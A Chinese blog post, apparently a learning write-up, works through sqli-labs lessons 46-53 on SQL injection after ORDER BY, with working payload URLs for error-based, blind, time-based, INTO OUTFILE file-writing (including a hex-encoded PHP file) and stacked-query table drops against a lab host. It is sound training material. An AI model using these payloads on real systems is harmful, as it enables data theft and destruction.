青蛙爱轮滑
青蛙爱轮滑

Sqli-labs Less46-53 order by 后的注入

本文记录 SQL 注入的学习过程,资料为 SQLi

SQLi 博客目录

Oeder By 后的注入

注入原理

?sort=1 desc
?sort=1 asc

显示结果不同,说明可以注入

desc是 descend 降序意思

asc 是 ascend 升序意思

可利用 order by 后的一些参数进行注入

2.1 order by 后的数字可以作为一个注入点。

  1. order by 后的数字可以作为一个注入点。也就是构造order by 后的一个语句,让该语句执行结果为一个数,我们尝试

    ?sort=right(version(),1)

    ?sort=left(version(),1)

    没有报错,但是 right 换成 left 都一样,说明数字没有起作用,我们考虑布尔类型。此时我们可以用报错注入和延时注入。

    此处可以直接构造 ?sort= 后面的一个参数。此时,我们可以有三种形式:

    1. 直接添加注入语句,?sort=(select ***)

    2. 利用一些函数。例如 rand()函数等。?sort=rand(sql 语句)

      Ps:此处我们可以展示一下 rand(true)和 rand(false)的结果是不一样的。

      ?sort=rand(true)

      ?sort=rand(false)

    3. 利用 and,例如 ?sort=1 and (加 sql 语句)。

      同时,sql 语句可以利用报错注入和延时注入的方式,语句我们可以很灵活的构造。

  2. 报错注入例子

    ?sort=(select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))

  3. rand() 例子

    ?sort=rand(ascii(left(database(),1))=115)

    ?sort=rand(ascii(left(database(),1))=116)

    从上述两个图的结果,对比 rand(ture) 和 rand(false) 的结果,可以看出报错注入是成功的

  4. 延时注入例子

    ?sort=1 and if(ascii(substr(database(),1,1))=116,0,sleep(5))

  5. 同时也可以用 ?sort=1 and 后添加注入语句

    ?sort=1 and left(database(),2)>‘sa’–+

2.2 procedure analyse 参数后注入

利用 procedure analyse 参数,我们可以执行报错注入。

同时,在 procedure analyse 和 order by 之间可以存在limit 参数,

我们在实际应用中,往往也可能会存在 limit 后的注入,可以利用 rocedure analyse 进行注入。

?sort=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)

2.3 将查询结果导入到文件当中

将查询结果导入到文件当中

?sort=1 into outfile "/tmp/test1.txt"

查看文件

root@ubuntu:# cat /tmp/test1.txt 
	1	Dumb	Dumb
	2	Angelina	I-kill-you
	3	Dummy	p@ssword
	4	secure	crappy
	5	stupid	stupidity
	6	superman	genious
	7	batman	mob!le
	8	admin	admin
	9	admin1	admin1
	10	admin2	admin2
	11	admin3	admin3
	12	dhakkan	dumbo
	14	admin4	admin4
	38	less38	hello
	39	less39	hello
	40	less40	hello
	109	hello	hello
	110	less41	hello
	144	less44	hello

Less - 46: GET - Error based - Numeric - ORDER BY CLAUSE

1. 源代码

	$id=$_GET['sort'];
    $sql = "SELECT * FROM users ORDER BY $id";

从上述的 sql 语句中我们可以看出,我们的注入点在 order by 后面的参数中,而 order by不同于的我们在 where 后的注入点,不能使用 union 等进行注入。

2. 测试漏洞

http://10.10.10.137/sqli-labs/Less-46/?sort=1 desc
http://10.10.10.137/sqli-labs/Less-46/?sort=1 asc

显示结果不同,说明可以注入

3. 注入

可利用 order by 后的一些参数进行注入

3.1 order by 后的数字可以作为一个注入点。

  1. order by 后的数字可以作为一个注入点。也就是构造order by 后的一个语句,让该语句执行结果为一个数,我们尝试

     http://10.10.10.137/sqli-labs/Less-46/?sort=right(version(),1)
 http://10.10.10.137/sqli-labs/Less-46/?sort=left(version(),1)

    没有报错,但是 right 换成 left 都一样,说明数字没有起作用,我们考虑布尔类型。此时我们可以用报错注入和延时注入。

    此处可以直接构造 ?sort= 后面的一个参数。此时,我们可以有三种形式:

    1. 直接添加注入语句,?sort=(select ***)

    2. 利用一些函数。例如 rand()函数等。?sort=rand(sql 语句)

      Ps:此处我们可以展示一下 rand(true)和 rand(false)的结果是不一样的。

       http://10.10.10.137/sqli-labs/Less-46/?sort=rand(true)
 http://10.10.10.137/sqli-labs/Less-46/?sort=rand(false)

    3. 利用 and,例如 ?sort=1 and (加 sql 语句)。

      同时,sql 语句可以利用报错注入和延时注入的方式,语句我们可以很灵活的构造。

  2. 报错注入例子

     http://10.10.10.137/sqli-labs/Less-46/?sort=(select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))

  3. rand() 演示

     http://10.10.10.137/sqli-labs/Less-46/?sort=rand(ascii(left(database(),1))=115)


     http://10.10.10.137/sqli-labs/Less-46/?sort=rand(ascii(left(database(),1))=116)

    从上述两个图的结果,对比 rand(ture) 和 rand(false) 的结果,可以看出报错注入是成功的

  4. 延时注入例子

     http://10.10.10.137/sqli-labs/Less-46/?sort= (SELECT IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,md5('1')),null) FROM (select database() as current) as tb1)

 http://10.10.10.137/sqli-labs/Less-46/?sort=1%20and%20If(ascii(substr(database(),1,1))=116,0,sleep(5))

  5. 同时也可以用 ?sort=1 and 后添加注入语句

     http://10.10.10.137/sqli-labs/Less-46/?sort=1 and left(database(),2)>'sa'--+

3.2 procedure analyse 参数后注入

利用 procedure analyse 参数,我们可以执行报错注入。同时,在 procedure analyse 和 order by 之间可以存在limit 参数,我们在实际应用中,往往也可能会存在 limit 后的注入,可以利用 rocedure analyse 进行注入。

http://10.10.10.137/sqli-labs/Less-46/?sort=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)

3.3

将查询结果导入到文件当中

http://10.10.10.137/sqli-labs/Less-46/?sort=1 into outfile "/tmp/test1.txt"

查看文件

root@ubuntu:# cat /tmp/test1.txt 
	1	Dumb	Dumb
	2	Angelina	I-kill-you
	3	Dummy	p@ssword
	4	secure	crappy
	5	stupid	stupidity
	6	superman	genious
	7	batman	mob!le
	8	admin	admin
	9	admin1	admin1
	10	admin2	admin2
	11	admin3	admin3
	12	dhakkan	dumbo
	14	admin4	admin4
	38	less38	hello
	39	less39	hello
	40	less40	hello
	109	hello	hello
	110	less41	hello
	144	less44	hello

Less - 47: GET - Error based - String - ORDER BY CLAUSE

  1. 源代码

     $id=$_GET['sort'];
 $sql = "SELECT * FROM users ORDER BY '$id'";

  2. order by 后的参数

    我们只能使用and 来进行报错和延时注入。

    1. 和 and rand 相结合的方式

       http://10.10.10.137/sqli-labs/Less-47/index.php?sort=1'and rand(ascii(left(database(),1))=115)--+


       http://10.10.10.137/sqli-labs/Less-47/index.php?sort=1'and rand(ascii(left(database(),1))=116)--+

      此处后期经过测试,还是存在问题的,我们不能使用这种方式进行准确的注入。此处留下只是一个示例。

    2. 可以利用报错的方式进行

       http://10.10.10.137/sqli-labs/Less-47/?sort=1'and (select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))--+

      可以看到 user()的内容,同时可以构造其他的语句进行注入。

      这里再放一个报错注入,原理和上面的payload 是一样的,都是利用的mysql 重复项的原理。

       http://10.10.10.137/sqli-labs/Less-47/?sort=1'and (select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x)--+

      此处重复了version(),所以就爆出了版本号

    3. 延时注入

       http://10.10.10.137/sqli-labs/Less-47/?sort=1'and If(ascii(substr(database(),1,1))=115,0,sleep(5))--+

      这里因 database() 为 security,所以第一个字母的 s 的 ascii 为 115,此处直接显示,当改为 116 或者其他的数字的时候,就要延时了,我们这里就不贴图展示了,可以通过脚本爆破

  3. procedure analyse 参数后注入

    利用 procedure analyse 参数,我们可以执行报错注入。同时,在 procedure analyse 和 order by 之间可以存在 limit 参数,我们在实际应用中,往往也可能会存在 limit 后的注入,可以利用 procedure analyse 进行注入。

     http://10.10.10.137/sqli-labs/Less-47/?sort=1' procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)--+

  4. 导入导出文件into outfile 参数

     http://10.10.10.137/sqli-labs/Less-47/?sort=1'into outfile "/tmp/test2.txt"--+

    将查询结果导入到文件当中

     root@ubuntu:# cat /tmp/test2.txt 
 	1	Dumb	Dumb
 	2	Angelina	I-kill-you
 	3	Dummy	p@ssword
 	4	secure	crappy
 	5	stupid	stupidity
 	6	superman	genious
 	7	batman	mob!le
 	8	admin	admin
 	9	admin1	admin1
 	10	admin2	admin2
 	11	admin3	admin3
 	12	dhakkan	dumbo
 	14	admin4	admin4

  5. 那这个时候我们可以考虑上传网马,利用lines terminated by

    Into outtfile /tmp/test3.txt lines terminated by 0x(网马进行 16 进制转换)

    将 进行 十六进制编码 0x3c3f70687020706870696e666f28293b3f3e2020

     http://10.10.10.137/sqli-labs/Less-47/?sort=1'into outfile "/tmp/test3.php"lines terminated by 0x3c3f70687020706870696e666f28293b3f3e2020--+

    可以搭配其他漏洞访问这个页面

Less - 48: GET - Error based - Blind- Numeric- ORDER BY CLAUSE##

  1. 原理

    本关与less-46 的区别在于报错注入不能使用,不进行错误回显,因此其他的方法我们依旧是可以使用的。

    可以利用sort=rand(true/false)进行判断。

  2. 源代码

     $id=$_GET['sort'];
 $sql = "SELECT * FROM users ORDER BY $id";

  3. 测试

     http://10.10.10.137/sqli-labs/Less-48/?sort=rand(ascii(left(database(),1))=178)


     http://10.10.10.137/sqli-labs/Less-48/?sort=rand(ascii(left(database(),1))=115)

    And 后的延时注入

     http://10.10.10.137/sqli-labs/Less-48/?sort=1%20and%20(If(ascii(substr(database(),1,1))=115,0,sleep(5)))

    导入导出文件注入

     http://127.0.0.1/sqllib/Less-48/?sort=1 into outfile "/tmp/test4.txt"--+


     root@ubuntu:/# cat /tmp/test4.txt 
 	1	Dumb	Dumb
 	2	Angelina	I-kill-you
 	3	Dummy	p@ssword
 	4	secure	crappy
 	5	stupid	stupidity
 	6	superman	genious
 	7	batman	mob!le
 	8	admin	admin
 	9	admin1	admin1
 	10	admin2	admin2
 	11	admin3	admin3
 	12	dhakkan	dumbo

Less - 49: GET - Error based - String- Blind - ORDER BY CLAUSE##

  1. 源代码

     $id=$_GET['sort'];
 $sql = "SELECT * FROM users ORDER BY '$id'";

  2. 测试

    本关与47 关基本类似,区别在于没有错误回显,所以我们可以通过延时注入和导入文件进行注入。

    利用延时注入

     Less-49/?sort=1' and (If(ascii(substr((select username from users where id=1),1,1))=69,0,sleep(5)))--+

    可以构造substr 的第一个参数进行后续注入

    利用 into outfile 进行注入

     http://10.10.10.137/sqli-labs/Less-49/?sort=1'into outfile "/tmp/test5.php" lines terminated by 0x3c3f70687020706870696e666f28293b3f3e2020--+

    可以搭配其他漏洞访问 /tmp/test5.php

Less - 50: GET - Error based - ORDER BY CLAUSE -numeric - Stacked Injection##

  1. 源代码

     $id=$_GET['sort'];
 $sql="SELECT * FROM users ORDER BY $id";

  2. 原理

    从本关开始我们开始进行order by stacked injection

    执行 sql 语句我们这里使用的是 mysqli_multi_query()函数,而之前我们使用的是 mysqli_query(),区别在于 mysqli_multi_query()可以执行多个 sql 语句,而 mysqli_query()只能执行一个sql 语句,那么我们此处就可以执行多个sql 语句进行注入,也就是我们之前提到的 statcked injection。

  3. 测试

     http://10.10.10.137/sqli-labs/Less-50/?sort=1;create table less50 like users

    已经创建了一个表 less50

     mysql> show tables;
 +--------------------+
 | Tables_in_security |
 +--------------------+
 | emails             | 
 | less50             | 
 | referers           | 
 | uagents            | 
 | users              | 
 +--------------------+
 5 rows in set (0.00 sec)

 http://10.10.10.137/sqli-labs/Less-50/?sort=1;droptable less50

    已经删除了表 less50

     mysql> show tables;
 +--------------------+
 | Tables_in_security |
 +--------------------+
 | emails             | 
 | referers           | 
 | uagents            | 
 | users              | 
 +--------------------+
 5 rows in set (0.00 sec)

Less - 51: GET - Error based - ORDER BY CLAUSE-String - Stacked Injection

  1. 源代码

     $id=$_GET['sort'];
 $sql="SELECT * FROM users ORDER BY '$id'";

  2. 测试

     http://10.10.10.137/sqli-labs/Less-51/?sort=1';create table less51 like users--+

    发现已经创建了一个表 less51

     mysql> show tables;
 +--------------------+
 | Tables_in_security |
 +--------------------+
 | emails             | 
 | less51             | 
 | referers           | 
 | uagents            | 
 | users              | 
 +--------------------+
 6 rows in set (0.00 sec)


 http://10.10.10.137/sqli-labs/Less-51/?sort=1';drop table less51--+

    发现已经删除了一个表 less51

     mysql> show tables;
 +--------------------+
 | Tables_in_security |
 +--------------------+
 | emails             | 
 | referers           | 
 | uagents            | 
 | users              | 
 +--------------------+
 6 rows in set (0.00 sec)

Less - 52: GET - Blind based - ORDER BY CLAUSE -numeric - Stacked Injection##

  1. 源代码

     $id=$_GET['sort'];
 $sql="SELECT * FROM users ORDER BY $id";

  2. 测试

    和 less50 是一样的,只是这里的 mysql 错误不会在前台显示,但是对于 stacked injection 是一样的利用方式

     http://10.10.10.137/sqli-labs/Less-52/?sort=1;create table less52 like users

    发现已经创建了一个表 less52

     mysql> show tables;
 +--------------------+
 | Tables_in_security |
 +--------------------+
 | emails             | 
 | less52             | 
 | referers           | 
 | uagents            | 
 | users              | 
 +--------------------+
 5 rows in set (0.00 sec)

    删除表 less52

     http://10.10.10.137/sqli-labs/Less-52/?sort=1;drop table less52

    已经删除了表 less52

     mysql> show tables;
 +--------------------+
 | Tables_in_security |
 +--------------------+
 | emails             | 
 | referers           | 
 | uagents            | 
 | users              | 
 +--------------------+
 4 rows in set (0.00 sec)

Less - 53: GET - Blind based - ORDER BY CLAUSE-String - Stacked Injection##

  1. 源代码

     $id=$_GET['sort'];
 $sql="SELECT * FROM users ORDER BY '$id'";

  2. 测试

    和 less51 是一样的,只是这里的 mysql 错误不会在前台显示,但是对于 stacked injection 是一样的利用方式

     http://10.10.10.137/sqli-labs/Less-53/?sort=1';create table less53 like users--+

    发现创建了表 less53

     mysql> show tables;
 +--------------------+
 | Tables_in_security |
 +--------------------+
 | emails             | 
 | less53             | 
 | referers           | 
 | uagents            | 
 | users              | 
 +--------------------+
 5 rows in set (0.00 sec)

    测试

     http://10.10.10.137/sqli-labs/Less-53/?sort=1';drop table less53 --+

    发现已经删除了 less53

     mysql> show tables;
 +--------------------+
 | Tables_in_security |
 +--------------------+
 | emails             | 
 | referers           | 
 | uagents            | 
 | users              | 
 +--------------------+
 4 rows in set (0.00 sec)

你可能感兴趣的:(web安全)

  • 网络安全(黑客)——自学2024 小言同学喜欢挖漏洞 web安全安全网络学习网络安全信息安全渗透测试
    01什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。02怎样规划网络安全如果你是一
  • 黑客(网络安全)技术自学30天 一个迷人的黑客 web安全安全网络笔记网络安全信息安全渗透测试
    01什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。02怎样规划网络安全如果你是一
  • 自学黑客(网络安全)技术——2024最新 九九归二 web安全安全学习笔记网络网络安全信息安全
    01什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。02怎样规划网络安全如果你是一
  • 网络安全(黑客)—2024自学笔记 羊村最强沸羊羊 web安全笔记安全网络安全网络python开发语言
    前言一、什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。二、怎样规划网络安全如果你
  • 网络安全(黑客)0基础到精通,看这一篇就够了! 羊村最强沸羊羊 web安全安全网络安全php网络python开发语言
    前言一、什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。二、怎样规划网络安全如果你
  • 2024网络安全-自学笔记 羊村最强沸羊羊 web安全安全网络安全开发语言phppython网络
    前言一、什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。二、怎样规划网络安全如果你
  • 网络安全(黑客技术)—0基础自学 羊村最强沸羊羊 网络安全web安全开发语言安全phppython网络
    前言一、什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如Web安全技术,既有Web渗透,也有Web防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。二、怎样规划网络安全如果你
  • 常见的几种Web安全问题测试简介 咖啡加剁椒.. 软件测试web安全安全功能测试软件测试自动化测试程序人生职场和发展
    Web项目比较常见的安全问题1.XSS(CrossSiteScript)跨站脚本攻击XSS(CrossSiteScript)跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。测试方法:在数据输入界面,添加记录输入:,添加成功如果弹出对话框,表明此处存在一个XSS漏洞。或把url请求中参数改为
  • HTTP查阅手册地址 iuiyiyut
    https://developer.mozilla.org/zh-CN/docs/Web/HTTP教程HTTP概述HTTP缓存HTTPcookiesHTTP访问控制(CORS)HTTP的演变Mozillaweb安全引导HTTP消息典型的HTTP会话HTTP/1.x中的连接管理参考文档HTTP首部HTTP请求方法HTTP状态返回码CSP指令工具与资源Firefox开发者工具MozillaObserv
  • Shiro-05-5 分钟入门 shiro 安全框架实战笔记 老马啸西风 web安全java安全架构开发语言哈希算法
    序言大家好,我是老马。前面我们学习了web安全之SpringSecurity入门教程这次我们来一起学习下另一款java安全框架shiro。什么是ApacheShiro?ApacheShiro是一个功能强大且易于使用的Java安全框架,它为开发人员提供了一种直观而全面的解决方案,用于身份验证,授权,加密和会话管理。实际上,它可以管理应用程序安全性的所有方面,同时尽可能避免干扰。它建立在可靠的界面驱动
  • web安全之 -- XSS攻击 似水牛年
    什么是XSS攻击XSS,即为(CrossSiteScripting),中文名为跨站脚本,是发生在目标用户的浏览器层面上的,当渲染DOM树的过程成发生了不在预期内执行的JS代码时,就发生了XSS攻击。跨站脚本的重点不在‘跨站’上,而在于‘脚本’上。大多数XSS攻击的主要方式是嵌入一段远程或者第三方域上的JS代码。实际上是在目标网站的作用域下执行了这段js代码。为不和层叠样式表(CascadingSt
  • 常见Web安全漏洞的实际案例和攻防技术 清水白石008 web安全安全
    常见Web安全漏洞的实际案例和攻防技术1、SQL注入攻击与防范:通过一个简单的Web应用演示SQL注入攻击,包括入侵者如何通过输入恶意SQL语句来获取敏感数据。提供相应的防范措施,包括参数化查询、ORM框架的使用等,并附上实际代码演示。Copycode#恶意SQL注入语句的示例SELECT*FROMusersWHEREusername='admin'ANDpassword='xxx'OR'1'=
  • 成为一名月薪2万的web安全工程师需要哪些技能? 闪现码狗
    现在web安全工程师比较火,岗位比较稀缺,现在除了一些大公司对学历要求严格,其余公司看中的大部分是能力。之前有个咨询的17岁的小伙子学习的就是相关方向,17岁,已经工作2年了……当初也是因为其他的要求比较高,所以才选择的web安全方向。那么成为一名web安全工程师需要哪些技能呢?下面就告诉你。01环境的搭建熟悉基本的虚拟机配置。Kalilinux,centos,Windows实验虚拟机自己搭建II
  • Web安全-JWT认证机制安全性浅析 Tr0e Web安全
    文章目录认证机制数据结构头部有效载荷签名数据转换安全缺陷密钥爆破认证机制JWT全称是JSONWebToken,是目前非常流行的跨域认证解决方案,在单点登录场景中经常使用到。JSONWebToken直接根据token取出保存的用户信息,以及对token可用性校验,大大简化单点登录。起源说起JWT,我们应该来谈一谈基于token的认证和传统的session认证的区别。传统的Session认证我们知道,
  • Web安全攻防_渗透测试实战指南 立志成为网安大牛 web安全安全
    目录第1章渗透测试之信息收集1.1收集域名信息1.1.1Whois查询1.1.2备案信息查询1.2收集敏感信息1.3收集子域名信息1.4收集常用端口信息1.5指纹识别1.6查找真实IP1.7收集敏感目录文件1.8社会工程学第1章渗透测试之信息收集**1.1收集域名信息**①得知目标域名②获取域名注册信息(域名DNS服务器信息和注册人联系信息)1.1.1Whois查询标准互联网协议,收集网络注册信息
  • 【web安全】渗透测试实战思路 星盾网安 付费专区web安全安全
    步骤一:选目标1.不建议太小的公司(可能都是请别人来开发的,用现成成熟的框架)2.不建议一线大厂:腾讯,字节,阿里等,你懂的3.不建议政府部门,安全设备多,每年有护网,报警你就死建议:找上市公司与子公司,有开发人员,就有漏洞重点:先在天眼查那些找域名所有上市公司链接:上市公司大全子公司:在官网上找步骤二:优先找登录入口1.用户名枚举2.寻找关键信息,看看官网有没有一些文章发布人的姓名,然后使用工具
  • 小白学安全--web安全入门(非常详细)零基础入门到精通,收藏这一篇就够了 网络安全大白 网络安全黑客程序员安全web安全
    作为一个从知道创与到自建安全团队的资深白帽子,一路也是从不止所谓的web小白历经磨难成长起来的我,给现在正在准备学习web安全的同学一些建议。在我认为,渗透安全的范围其实要学习的东西很广泛的,间接的相当于你要是一个前端工程师,也要是一个后端工程师(其中就包含主流的php,JAVA,python等),如果学习移动端安全,你还要是一个出色的安卓工程师,而网络安全又细分为很多方向,比如系统安全、移动安全
  • 什么是SQL注入,有什么防范措施 安全http
    随着互联网的普及和数字化进程的加速,Web攻击已经成为网络安全领域的一大威胁。Web攻击不仅可能导致个人隐私泄露、财产损失,还可能对企业和国家的安全造成严重影响。下面德迅云安全就分享一种常见的web攻击方式-SQL注入,了解下什么是SQL注入,还有面对攻击时有哪些防范措施。通过了解这方面的网络安全知识,可以提高日常的web安全性。什么是SQL注入:SQL注入(SQLInjection)是一种常见的
  • Web安全研究(六) 西杭 web安全安全
    文章目录HideNoSeek:Camouflaging(隐藏)MaliciousJavaScriptinBenignASTs文章结构IntrojsobfuscationmethodologyExampleHideNoSeek:Camouflaging(隐藏)MaliciousJavaScriptinBenignASTsCCS2019CISPA恶意软件领域,基于学习的系统已经非常流行,并且可以检测新
  • ACM CCS 2020 · web安全研究学者 丫丫二_97 web安全web安全
    ACMCCS2020·web安全研究学者锁一下!最近打算整理下这些学者的论文,然后看一下他们的研究脉络。其他四大也应该锁一下。GiovanniVigna学校:UniversityofCaliforniainSantaBarbara(UCSB,加州大学圣巴巴拉分校)研究机构:DepartmentofComputerScience方向:vulnerabilityanalysis,websecurity
  • 2022网络安全超详细路线图,零基础入门看这篇就够了 技术宅不太宅 程序人生web安全网络安全kali渗透渗透测试sql注入
    一.开始前的思考1.我真的喜欢搞安全吗?2.我只是想通过安全赚钱钱吗?3.我不知道做什么就是随便。4.一辈子做信息安全吗这些不想清楚会对你以后的发展很不利,与其盲目的学习web安全,不如先做一个长远的计划。否则在我看来都是浪费时间。如果你考虑好了参照我的计划进行学习,我不敢保证你实践完多牛逼,但是找6k-9k的工作绝对不成问题。1.目的本问目的是带大家快速入门web安全,不会搞些虚张声势的东西都是
  • (2022版)零基础入门网络安全/Web安全,收藏这一篇就够了 网络安全-无涯 web安全安全网络网络安全面试
    由于我之前写了不少网络安全技术相关的文章和回答,不少读者朋友知道我是从事网络安全相关的工作,于是经常有人私信问我:我刚入门网络安全,该怎么学?要学哪些东西?有哪些方向?怎么选?这一行职业前景如何?废话不多说,先上一张图镇楼,看看网络安全有哪些方向,它们之间有什么关系和区别,各自需要学习哪些东西。在这个圈子技术门类中,工作岗位主要有以下三个方向:安全研发安全研究:二进制方向安全研究:网络渗透方向下面
  • Web安全测试之XSS 中科恒信
    XSS全称(CrossSiteScripting)跨站脚本攻击,是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript),当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的.比如获取用户的Cookie,导航到恶意网站,携带木马等。作为测试人员,需要了解XSS的原理,攻击场景,如何修复。才能有效的防止XSS的发生。阅读目录XSS是如何发生的HTMLE
  • 典型Web安全防护策略 爱看时事的通信崔
    Web安全问题的凸显致使得安全防护人员实施大量的安全机制来抵御攻击,尽管各种安全机制设计细节和执行效率可能千差万别,但几乎所有Web应用采用的安全机制在策略上都具有相似性,都离不开核心的几个基本原则和主要措施。一、基本原则1、缺省安全缺省安全可以说是Web安全中最基本、最重要的原则,可以归纳为白名单、黑名单的思想以及最小权限原则。黑名单、白名单思想应该都很熟悉,最典型的例子莫过于制定防火墙的访问控
  • Web 应用安全发展的介绍 Wang's Blog Web黑客web安全
    黑客技术的发展历史1990年代初,部分人开始研究黑客技术1997-1999黑客团队涌现,进入黄金时代21世纪初,黑客工具傻瓜化,门槛降低,黑客精神不再希望今天的web是安全的春天关于安全公司的甲方和乙方甲方:如腾讯、阿里等需要安全服务的公司乙方:提供安全服务、产品的服务型安全公司圈内熟知的安全公司:绿盟、知道创宇、安天、启明星辰、安恒、天融信Web与二进制Web,研究web安全二进制,研究客户端安
  • 前端必备的 web 安全知识手记 就是不吃苦瓜 前端安全web安全网络智能路由器学习
    前言安全这种东西就是不发生则已,一发生则惊人。作为前端,平时对这方面的知识没啥研究,最近了解了下,特此沉淀。文章内容包括以下几个典型的web安全知识点:XSS、CSRF、点击劫持、SQL注入和上传问题等(下文以小王代指攻击者),话不多说,我们直接开车(附带的例子浅显易懂哦)。XSS(Cross-sitescripting)XSS中文叫做跨站脚本攻击。一句话解释:小王在网页中注入恶意代码,当用户访问
  • [web安全]深入理解反射式dll注入技术 H_00c8
    一、前言dll注入技术是让某个进程主动加载指定的dll的技术。恶意软件为了提高隐蔽性,通常会使用dll注入技术将自身的恶意代码以dll的形式注入高可信进程。常规的dll注入技术使用LoadLibraryA()函数来使被注入进程加载指定的dll。常规dll注入的方式一个致命的缺陷是需要恶意的dll以文件的形式存储在受害者主机上。这样使得常规dll注入技术在受害者主机上留下痕迹较大,很容易被edr等安
  • 风炫安全web安全学习第三十五节课 文件下载和文件读取漏洞 风炫安全
    风炫安全web安全学习第三十五节课文件下载和文件读取漏洞0x03任意文件下载漏洞一些网站由于业务需求,往往需要提供文件下载功能,但若对用户下载的文件不做限制,则恶意用户就能够下载任意敏感文件,这就是文件下载漏洞。漏洞产生原因有读取文件的函数读物文件的路径用户可控,且没有经过校验,或者校验不严格输出文件内容一个正常的网站,存在一个下载文件的功能,同时还会从浏览器接收文件名字文件下载的两种方式1、直接
  • Content Security Policy (CSP) 中的 frame-ancestors 'self' 指令介绍
    ContentSecurityPolicy(CSP)是一种Web安全标准,旨在减少和防止网站上的一些特定类型的攻击,例如跨站脚本攻击(XSS)。CSP允许站点管理员定义允许加载的资源的白名单,限制了浏览器可以执行的操作,从而提高网站的安全性。在CSP中,frame-ancestors是一项用于限制页面能够被嵌入的位置的指令。指令的具体内容是frame-ancestors'self',意味着只允许页
  • Web安全 Towain
    正确思维方式的重要性,因此我告知好友:安全工程师的核心竞争力不在于他能拥有多少个0day,掌握多少种安全技术,而是在于他对安全理解的深度,以及由此引申的看待安全问题的角度和高度。我是如此想的,也是如此做的。
  • java解析APK 3213213333332132 javaapklinux解析APK
    解析apk有两种方法 1、结合安卓提供apktool工具,用java执行cmd解析命令获取apk信息 2、利用相关jar包里的集成方法解析apk 这里只给出第二种方法,因为第一种方法在linux服务器下会出现不在控制范围之内的结果。 public class ApkUtil { /** * 日志对象 */ private static Logger
  • nginx自定义ip访问N种方法 ronin47 nginx 禁止ip访问
       因业务需要,禁止一部分内网访问接口, 由于前端架了F5,直接用deny或allow是不行的,这是因为直接获取的前端F5的地址。    所以开始思考有哪些主案可以实现这样的需求,目前可实施的是三种:    一:把ip段放在redis里,写一段lua           二:利用geo传递变量,写一段
  • mysql timestamp类型字段的CURRENT_TIMESTAMP与ON UPDATE CURRENT_TIMESTAMP属性 dcj3sjt126com mysql
    timestamp有两个属性,分别是CURRENT_TIMESTAMP 和ON UPDATE CURRENT_TIMESTAMP两种,使用情况分别如下:   1.   CURRENT_TIMESTAMP    当要向数据库执行insert操作时,如果有个timestamp字段属性设为   CURRENT_TIMESTAMP,则无论这
  • struts2+spring+hibernate分页显示 171815164 Hibernate
    分页显示一直是web开发中一大烦琐的难题,传统的网页设计只在一个JSP或者ASP页面中书写所有关于数据库操作的代码,那样做分页可能简单一点,但当把网站分层开发后,分页就比较困难了,下面是我做Spring+Hibernate+Struts2项目时设计的分页代码,与大家分享交流。   1、DAO层接口的设计,在MemberDao接口中定义了如下两个方法: public in
  • 构建自己的Wrapper应用 g21121 rap
            我们已经了解Wrapper的目录结构,下面可是正式利用Wrapper来包装我们自己的应用,这里假设Wrapper的安装目录为:/usr/local/wrapper。           首先,创建项目应用   &nb
  • [简单]工作记录_多线程相关 53873039oycg 多线程
